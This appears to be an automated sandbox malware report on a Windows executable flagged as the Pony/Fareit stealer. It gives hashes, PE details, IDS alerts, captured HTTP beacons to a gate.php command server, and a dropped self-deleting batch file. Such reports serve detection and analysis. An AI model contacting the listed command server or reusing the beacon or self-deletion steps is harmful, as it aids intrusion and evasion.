                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                TRELLIAN-AS-APTrellianPtyLimitedAUhttp://crackdownloadz.comGet hashmaliciousUnknownBrowse
                • 103.224.182.206
                RCZ-PI-4057.exeGet hashmaliciousFormBookBrowse
                • 103.224.182.242
                Document_081924.exeGet hashmaliciousFormBookBrowse
                • 103.224.182.242
                https://projectresolvedapp.pages.dev/dappsGet hashmaliciousUnknownBrowse
                • 103.224.212.214
                APS-0240226.exeGet hashmaliciousFormBookBrowse
                • 103.224.182.242
                Shipping document_pdf.exeGet hashmaliciousFormBookBrowse
                • 103.224.182.242
                https://www.regionvictoriaville.com/page/?ContentID=1257Get hashmaliciousUnknownBrowse
                • 103.224.212.215
                http://mapwuest.comGet hashmaliciousUnknownBrowse
                • 103.224.182.246
                New order.exeGet hashmaliciousFormBookBrowse
                • 103.224.182.242
                Document 240000807.exeGet hashmaliciousFormBookBrowse
                • 103.224.182.242
                BODIS-NJUShttp://survey-smiles.comGet hashmaliciousUnknownBrowse
                • 199.59.243.226
                PO TIYEY078K.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                • 199.59.243.226
                http://join-telesex-free.pages.dev/link-1/link-1Get hashmaliciousUnknownBrowse
                • 199.59.243.226
                Pro#U015bba o Wycena - Strony 4-6.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                • 199.59.243.226
                DHL 0009485777.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                • 199.59.243.226
                !2#4.exeGet hashmaliciousFormBookBrowse
                • 199.59.243.226
                PRODUCTS SHEET 0051937.exeGet hashmaliciousFormBookBrowse
                • 199.59.243.226
                RFQ-180624.exeGet hashmaliciousFormBookBrowse
                • 199.59.243.226
                SecuriteInfo.com.PDF.Phishing.7B6B.tr.10532.1457.xlsxGet hashmaliciousFormBookBrowse
                • 199.59.243.226
                https://www.regionvictoriaville.com/page/?ContentID=1257Get hashmaliciousUnknownBrowse
                • 199.59.243.226

                JA3 Fingerprints

                No context

                Dropped Files

                No context

                Created / dropped Files

                C:\Users\user\AppData\Local\Temp\7041625.bat

                Download File
                Process:C:\Users\user\Desktop\AxgZVzUv8m.exe
                File Type:ASCII text, with CRLF, CR line terminators
                Category:dropped
                Size (bytes):94
                Entropy (8bit):3.233204299824007
                Encrypted:false
                SSDEEP:3:k4Zoa5/kFWJFFN6dAFZkMFlGl/AVFn:k/0/kFY/NDFZotwFn
                MD5:3880EEB1C736D853EB13B44898B718AB
                SHA1:4EEC9D50360CD815211E3C4E6BDD08271B6EC8E6
                SHA-256:936D9411D5226B7C5A150ECAF422987590A8870C8E095E1CAA072273041A86E7
                SHA-512:3EAA3DDDD7A11942E75ACD44208FBE3D3FF8F4006951CD970FB9AB748C160739409803450D28037E577443504707FC310C634E9DC54D0C25E8CFE6094F017C6B
                Malicious:false
                Reputation:moderate, very likely benign file
                Preview:......... :ktk ...... del . %1 ...if .. exist . %1 . goto .. ktk.. del . %0

                Static File Info

                General

                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Entropy (8bit):5.595815524962291
                TrID:
                • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                • Win32 Executable (generic) a (10002005/4) 49.78%
                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                • Generic Win/DOS Executable (2004/3) 0.01%
                • DOS Executable Generic (2002/1) 0.01%
                File name:AxgZVzUv8m.exe
                File size:509'952 bytes
                MD5:0dc91d39870a081f44b8429dcfbc223f
                SHA1:2033cf336c22ca200e212333a4ebecfc25eeb43f
                SHA256:f1114e448e0d95855b4124a0cc4fc0b601e187db29ec697128bee4d776c6eccb
                SHA512:6cd2218a0bb9bc4b177173d03076a1af59a6d1f38dac7fc5f1d7a89c385b4205490706a8c44e34551ba237e585ffeb26f42b7dd6e902754d6a6a16f07000dddd
                SSDEEP:12288:C9Y0A+J8888888x8MnBOky33qKQRaVogh8juqjYFa4n+Fo6xg:gnPJ8888888x8MnBg33qKQRaVogh8jJE
                TLSH:8DB492D3F2D669A2C701E572313A99B1181E5EA4629E1FFD51ABF73B30B61C00C1BC5A
                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......S.................$...........C... ...`....@.. ....................... ............@................................

                File Icon

                Icon Hash:70f0ecccdce2b051

                Static PE Info

                General

                Entrypoint:0x41432e
                Entrypoint Section:.text
                Digitally signed:false
                Imagebase:0x400000
                Subsystem:windows gui
                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Time Stamp:0x53C40593 [Mon Jul 14 16:30:11 2014 UTC]
                TLS Callbacks:
                CLR (.Net) Version:
                OS Version Major:4
                OS Version Minor:0
                File Version Major:4
                File Version Minor:0
                Subsystem Version Major:4
                Subsystem Version Minor:0
                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                Entrypoint Preview

                Instruction
                jmp dword ptr [00402000h]
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al

                Data Directories

                NameVirtual AddressVirtual Size Is in Section
                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IMPORT0x142d40x57.text
                IMAGE_DIRECTORY_ENTRY_RESOURCE0x160000x69ef0.rsrc
                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                IMAGE_DIRECTORY_ENTRY_BASERELOC0x800000xc.reloc
                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                Sections

                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                .text0x20000x123340x12400e238712755902fccfda664820be13a0eFalse0.7805944991438356data7.65846150249695IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                .rsrc0x160000x69ef00x6a000a610ec2506c42e1d65e510b789e8fdc2False0.1345260908018868data5.003567849615549IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                .reloc0x800000xc0x20046fd6928d5bcc242bf214ac8cb860a9eFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                Resources

                NameRVASizeTypeLanguageCountryZLIB Complexity
                RT_ICON0x162680x42028Device independent bitmap graphic, 256 x 512 x 32, image size 270336, resolution 2835 x 2835 px/m0.07400065094535017
                RT_ICON0x582900x10828Device independent bitmap graphic, 128 x 256 x 32, image size 675840.1495770732284396
                RT_ICON0x68ab80x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 380160.27307126340130333
                RT_ICON0x71f600x5488Device independent bitmap graphic, 72 x 144 x 32, image size 216000.29357670979667283
                RT_ICON0x773e80x4228Device independent bitmap graphic, 64 x 128 x 32, image size 168960.2719059990552669
                RT_ICON0x7b6100x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 96000.4067427385892116
                RT_ICON0x7dbb80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 42240.45661350844277676
                RT_ICON0x7ec600x988Device independent bitmap graphic, 24 x 48 x 32, image size 24000.580327868852459
                RT_ICON0x7f5e80x468Device independent bitmap graphic, 16 x 32 x 32, image size 10880.6551418439716312
                RT_GROUP_ICON0x7fa500x84data0.7121212121212122
                RT_VERSION0x7fad40x41cdata0.435361216730038

                Imports

                DLLImport
                mscoree.dll_CorExeMain

                Network Behavior

                Suricata IDS Alerts

                TimestampProtocolSIDSignatureSeveritySource PortDest PortSource IPDest IP
                2024-08-19T16:43:43.578383+0200TCP2014562ET MALWARE Pony Downloader HTTP Library MSIE 5 Win9814970880192.168.2.8103.224.212.212
                2024-08-19T16:43:44.649406+0200TCP2014562ET MALWARE Pony Downloader HTTP Library MSIE 5 Win9814971080192.168.2.8199.59.243.226

                Network Port Distribution

                TCP Packets

                TimestampSource PortDest PortSource IPDest IP
                Aug 19, 2024 16:43:42.814620972 CEST4970880192.168.2.8103.224.212.212
                Aug 19, 2024 16:43:42.819780111 CEST8049708103.224.212.212192.168.2.8
                Aug 19, 2024 16:43:42.819911957 CEST4970880192.168.2.8103.224.212.212
                Aug 19, 2024 16:43:42.819911957 CEST4970880192.168.2.8103.224.212.212
                Aug 19, 2024 16:43:42.824767113 CEST8049708103.224.212.212192.168.2.8
                Aug 19, 2024 16:43:43.575997114 CEST8049708103.224.212.212192.168.2.8
                Aug 19, 2024 16:43:43.578324080 CEST8049708103.224.212.212192.168.2.8
                Aug 19, 2024 16:43:43.578382969 CEST4970880192.168.2.8103.224.212.212
                Aug 19, 2024 16:43:43.615467072 CEST4970880192.168.2.8103.224.212.212
                Aug 19, 2024 16:43:43.620423079 CEST8049708103.224.212.212192.168.2.8
                Aug 19, 2024 16:43:44.137830973 CEST4971080192.168.2.8199.59.243.226
                Aug 19, 2024 16:43:44.142843008 CEST8049710199.59.243.226192.168.2.8
                Aug 19, 2024 16:43:44.142987967 CEST4971080192.168.2.8199.59.243.226
                Aug 19, 2024 16:43:44.143043041 CEST4971080192.168.2.8199.59.243.226
                Aug 19, 2024 16:43:44.149456978 CEST8049710199.59.243.226192.168.2.8
                Aug 19, 2024 16:43:44.649259090 CEST8049710199.59.243.226192.168.2.8
                Aug 19, 2024 16:43:44.649307966 CEST8049710199.59.243.226192.168.2.8
                Aug 19, 2024 16:43:44.649405956 CEST4971080192.168.2.8199.59.243.226
                Aug 19, 2024 16:43:44.649461031 CEST8049710199.59.243.226192.168.2.8
                Aug 19, 2024 16:43:44.649516106 CEST4971080192.168.2.8199.59.243.226
                Aug 19, 2024 16:43:44.722608089 CEST4971080192.168.2.8199.59.243.226
                Aug 19, 2024 16:43:44.727612019 CEST8049710199.59.243.226192.168.2.8

                UDP Packets

                TimestampSource PortDest PortSource IPDest IP
                Aug 19, 2024 16:43:42.449014902 CEST5831953192.168.2.81.1.1.1
                Aug 19, 2024 16:43:42.811762094 CEST53583191.1.1.1192.168.2.8
                Aug 19, 2024 16:43:43.616946936 CEST6214453192.168.2.81.1.1.1
                Aug 19, 2024 16:43:44.136951923 CEST53621441.1.1.1192.168.2.8
                Aug 19, 2024 16:44:27.727262020 CEST5365034162.159.36.2192.168.2.8
                Aug 19, 2024 16:44:28.655699015 CEST53498661.1.1.1192.168.2.8

                DNS Queries

                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                Aug 19, 2024 16:43:42.449014902 CEST192.168.2.81.1.1.10xe1b7Standard query (0)dillion0mill.favcc1.comA (IP address)IN (0x0001)false
                Aug 19, 2024 16:43:43.616946936 CEST192.168.2.81.1.1.10xf4e1Standard query (0)ww25.dillion0mill.favcc1.comA (IP address)IN (0x0001)false

                DNS Answers

                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                Aug 19, 2024 16:43:42.811762094 CEST1.1.1.1192.168.2.80xe1b7No error (0)dillion0mill.favcc1.com103.224.212.212A (IP address)IN (0x0001)false
                Aug 19, 2024 16:43:44.136951923 CEST1.1.1.1192.168.2.80xf4e1No error (0)ww25.dillion0mill.favcc1.com77026.bodis.comCNAME (Canonical name)IN (0x0001)false
                Aug 19, 2024 16:43:44.136951923 CEST1.1.1.1192.168.2.80xf4e1No error (0)77026.bodis.com199.59.243.226A (IP address)IN (0x0001)false

                HTTP Request Dependency Graph

                • dillion0mill.favcc1.com
                • ww25.dillion0mill.favcc1.com

                HTTP Packets

                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                0192.168.2.849708103.224.212.212802744C:\Users\user\Desktop\AxgZVzUv8m.exe
                TimestampBytes transferredDirectionData
                Aug 19, 2024 16:43:42.819911957 CEST183OUTGET /gate.php HTTP/1.0
                Host: dillion0mill.favcc1.com
                Accept: */*
                Accept-Encoding: identity, *;q=0
                Connection: close
                User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
                Aug 19, 2024 16:43:43.575997114 CEST351INHTTP/1.1 302 Found
                date: Mon, 19 Aug 2024 14:43:43 GMT
                server: Apache
                set-cookie: __tad=1724078623.3206747; expires=Thu, 17-Aug-2034 14:43:43 GMT; Max-Age=315360000
                location: http://ww25.dillion0mill.favcc1.com/gate.php?subid1=20240820-0043-4362-acc8-bed20fff9940
                content-length: 2
                content-type: text/html; charset=UTF-8
                connection: close
                Data Raw: 0a 0a
                Data Ascii:


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                1192.168.2.849710199.59.243.226802744C:\Users\user\Desktop\AxgZVzUv8m.exe
                TimestampBytes transferredDirectionData
                Aug 19, 2024 16:43:44.143043041 CEST232OUTGET /gate.php?subid1=20240820-0043-4362-acc8-bed20fff9940 HTTP/1.0
                Host: ww25.dillion0mill.favcc1.com
                Accept: */*
                Accept-Encoding: identity, *;q=0
                Connection: close
                User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
                Aug 19, 2024 16:43:44.649259090 CEST1236INHTTP/1.1 200 OK
                date: Mon, 19 Aug 2024 14:43:44 GMT
                content-type: text/html; charset=utf-8
                content-length: 1210
                x-request-id: 9ee1cf00-22d7-419c-ad0b-9dee7756ccb2
                cache-control: no-store, max-age=0
                accept-ch: sec-ch-prefers-color-scheme
                critical-ch: sec-ch-prefers-color-scheme
                vary: sec-ch-prefers-color-scheme
                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_C5+L5nUWmAu2SGi66U6B9shqlx92WoCwezm5sg3VK7SeiDeQs+RZoSbeC+Djmnf9RLrJjX6vMSCufCeRg4R/MA==
                set-cookie: parking_session=9ee1cf00-22d7-419c-ad0b-9dee7756ccb2; expires=Mon, 19 Aug 2024 14:58:44 GMT; path=/
                connection: close
                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 43 35 2b 4c 35 6e 55 57 6d 41 75 32 53 47 69 36 36 55 36 42 39 73 68 71 6c 78 39 32 57 6f 43 77 65 7a 6d 35 73 67 33 56 4b 37 53 65 69 44 65 51 73 2b 52 5a 6f 53 62 65 43 2b 44 6a 6d 6e 66 39 52 4c 72 4a 6a 58 36 76 4d 53 43 75 66 43 65 52 67 34 52 2f 4d 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_C5+L5nUWmAu2SGi66U6B9shqlx92WoCwezm5sg3VK7SeiDeQs+RZoSbeC+Djmnf9RLrJjX6vMSCufCeRg4R/MA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                Aug 19, 2024 16:43:44.649307966 CEST663INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiOWVlMWNmMDAtMjJkNy00MTljLWFkMGItOWRlZTc3NTZjY2IyIiwicGFnZV90aW1lIjoxNzI0MDc4Nj


                Statistics

                CPU Usage

                Click to jump to process

                Memory Usage

                Click to jump to process

                High Level Behavior Distribution

                Click to dive into process behavior distribution

                Behavior

                Click to jump to process

                System Behavior

                General

                Target ID:0
                Start time:10:43:39
                Start date:19/08/2024
                Path:C:\Users\user\Desktop\AxgZVzUv8m.exe
                Wow64 process (32bit):true
                Commandline:"C:\Users\user\Desktop\AxgZVzUv8m.exe"
                Imagebase:0x10000
                File size:509'952 bytes
                MD5 hash:0DC91D39870A081F44B8429DCFBC223F
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:low
                Has exited:true

                General

                Target ID:3
                Start time:10:43:39
                Start date:19/08/2024
                Path:C:\Users\user\Desktop\AxgZVzUv8m.exe
                Wow64 process (32bit):true
                Commandline:"C:\Users\user\Desktop\AxgZVzUv8m.exe"
                Imagebase:0x860000
                File size:509'952 bytes
                MD5 hash:0DC91D39870A081F44B8429DCFBC223F
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_Pony, Description: Yara detected Pony, Source: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Pony_d5516fe8, Description: unknown, Source: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                • Rule: pony, Description: Identify Pony, Source: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Brian Wallace @botnet_hunter
                • Rule: Fareit, Description: Fareit Payload, Source: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                Reputation:low
                Has exited:true

                General

                Target ID:5
                Start time:10:43:45
                Start date:19/08/2024
                Path:C:\Windows\SysWOW64\cmd.exe
                Wow64 process (32bit):true
                Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\7041625.bat" "C:\Users\user\Desktop\AxgZVzUv8m.exe" "
                Imagebase:0xa40000
                File size:236'544 bytes
                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:false

                General

                Target ID:6
                Start time:10:43:45
                Start date:19/08/2024
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff6ee680000
                File size:862'208 bytes
                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:false

                Disassembly

                Reset < >

                  Execution Graph

                  Execution Coverage:39%
                  Dynamic/Decrypted Code Coverage:100%
                  Signature Coverage:4.3%
                  Total number of Nodes:69
                  Total number of Limit Nodes:3
                  execution_graph 2249 6750c72 2251 6750c9b LookupPrivilegeValueW 2249->2251 2252 6750cc2 2251->2252 2253 6750032 2254 6750082 VerLanguageNameW 2253->2254 2255 6750090 2254->2255 2256 6750df2 2257 6750e21 AdjustTokenPrivileges 2256->2257 2259 6750e43 2257->2259 2260 67506b2 2262 67506e7 ReadFile 2260->2262 2263 6750719 2262->2263 2264 67502b2 2265 675031f 2264->2265 2266 67502de FindCloseChangeNotification 2264->2266 2265->2266 2267 67502ec 2266->2267 2268 675107e 2269 67510b3 TerminateProcess 2268->2269 2271 67510dc 2269->2271 2272 69b122 2273 69b14e LoadLibraryShim 2272->2273 2275 69b17c 2273->2275 2276 67508fa 2277 6750923 SetFileAttributesW 2276->2277 2279 675093f 2277->2279 2280 69bda6 2281 69bdd5 GetFileVersionInfoW 2280->2281 2283 69bdf8 2281->2283 2284 69a23a 2285 69a260 GetModuleHandleW 2284->2285 2287 69a283 2285->2287 2288 69b8fa 2289 69b926 FreeLibrary 2288->2289 2291 69b95a 2288->2291 2290 69b93b 2289->2290 2291->2289 2328 675032d 2330 675035e CreateFileW 2328->2330 2331 67503e5 2330->2331 2332 67504ef 2333 6750522 GetFileType 2332->2333 2335 6750584 2333->2335 2300 69bcf6 2302 69bd1f GetFileVersionInfoSizeW 2300->2302 2303 69bd3b 2302->2303 2336 69a98a 2337 69a9ba RegOpenKeyExW 2336->2337 2339 69aa48 2337->2339 2304 69b84e 2305 69b874 LoadLibraryW 2304->2305 2307 69b890 2305->2307 2308 69a4ce 2309 69a50c DuplicateHandle 2308->2309 2310 69a544 2308->2310 2311 69a51a 2309->2311 2310->2309 2340 6750692 2341 67506b2 ReadFile 2340->2341 2343 6750719 2341->2343 2344 69aa81 2345 69aac2 RegQueryValueExW 2344->2345 2347 69ab4b 2345->2347 2312 675035e 2313 6750396 CreateFileW 2312->2313 2315 67503e5 2313->2315 2324 6751040 2325 675107e TerminateProcess 2324->2325 2327 67510dc 2325->2327 2320 6750ec2 2321 6750eee K32EnumProcesses 2320->2321 2323 6750f0a 2321->2323

                  Executed Functions

                  Function 00AB0B58 Relevance: 5.0, Strings: 3, Instructions: 1256COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1591135701.0000000000AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_ab0000_AxgZVzUv8m.jbxd
                  Similarity
                  • API ID:
                  • String ID: 4$:@Fl$P-l
                  • API String ID: 0-3948865390
                  • Opcode ID: acf50d592d88e2b7d86e1418c2425747320590a10c45dd06c4a3b275e6286904
                  • Instruction ID: cdbcd1ccfc396a9a70296118940b045b428127642c7879742840800c64156eba
                  • Opcode Fuzzy Hash: acf50d592d88e2b7d86e1418c2425747320590a10c45dd06c4a3b275e6286904
                  • Instruction Fuzzy Hash: FAA2E030B002148FDB24EB34C864BAEB7B6AFC5308F558569D40A9B7A6DF319C45CB95
                  Function 06750DF2 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1005 6750df2-6750e1f 1006 6750e24-6750e33 1005->1006 1007 6750e21 1005->1007 1008 6750e35-6750e3d AdjustTokenPrivileges 1006->1008 1009 6750e76-6750e7b 1006->1009 1007->1006 1010 6750e43-6750e55 1008->1010 1009->1008 1012 6750e57-6750e73 1010->1012 1013 6750e7d-6750e82 1010->1013 1013->1012
                  APIs
                  • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 06750E3B
                  Memory Dump Source
                  • Source File: 00000000.00000002.1594321277.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_6750000_AxgZVzUv8m.jbxd
                  Similarity
                  • API ID: AdjustPrivilegesToken
                  • String ID:
                  • API String ID: 2874748243-0
                  • Opcode ID: 15c254d6634ba34ce50c93976aa52fe349dd8593d34f7deea14de697c165ef4e
                  • Instruction ID: b4a911c2a2248e8c2a0bacfc244e7089773cf1becb7b838bad8ccaf4bf0f6bd0
                  • Opcode Fuzzy Hash: 15c254d6634ba34ce50c93976aa52fe349dd8593d34f7deea14de697c165ef4e
                  • Instruction Fuzzy Hash: C911A0715046449FEB20CF55D884B66FBE4EF04720F08C8AEDE458B661D371E414CF62
                  Function 00AB0B48 Relevance: 1.9, Strings: 1, Instructions: 640COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1591135701.0000000000AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_ab0000_AxgZVzUv8m.jbxd
                  Similarity
                  • API ID:
                  • String ID: P-l
                  • API String ID: 0-2176228525
                  • Opcode ID: 4517d205f1257c00b3730b66fdea92e000176fed79e755000038e9e2e3b03d30
                  • Instruction ID: b1338a7ab685149205e06dec5b19a3a595f95e98ebcf586ce660c1d21a67348a
                  • Opcode Fuzzy Hash: 4517d205f1257c00b3730b66fdea92e000176fed79e755000038e9e2e3b03d30
                  • Instruction Fuzzy Hash: D0425E34B10214CFDB24EB74C868BAEB7B2AF89304F548569D41A9B7A6DF319C85CF44
                  Function 0675032D Relevance: 1.6, APIs: 1, Instructions: 97fileCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 833 675032d-67503b6 837 67503b8 833->837 838 67503bb-67503c7 833->838 837->838 839 67503cc-67503d5 838->839 840 67503c9 838->840 841 67503d7-67503fb CreateFileW 839->841 842 6750426-675042b 839->842 840->839 845 675042d-6750432 841->845 846 67503fd-6750423 841->846 842->841 845->846
                  APIs
                  • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 067503DD
                  Memory Dump Source
                  • Source File: 00000000.00000002.1594321277.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_6750000_AxgZVzUv8m.jbxd
                  Similarity
                  • API ID: CreateFile
                  • String ID:
                  • API String ID: 823142352-0
                  • Opcode ID: 49d0a78d299d97b52c1e4773510e058984337e1478845ebd0edc5307a5d5db78
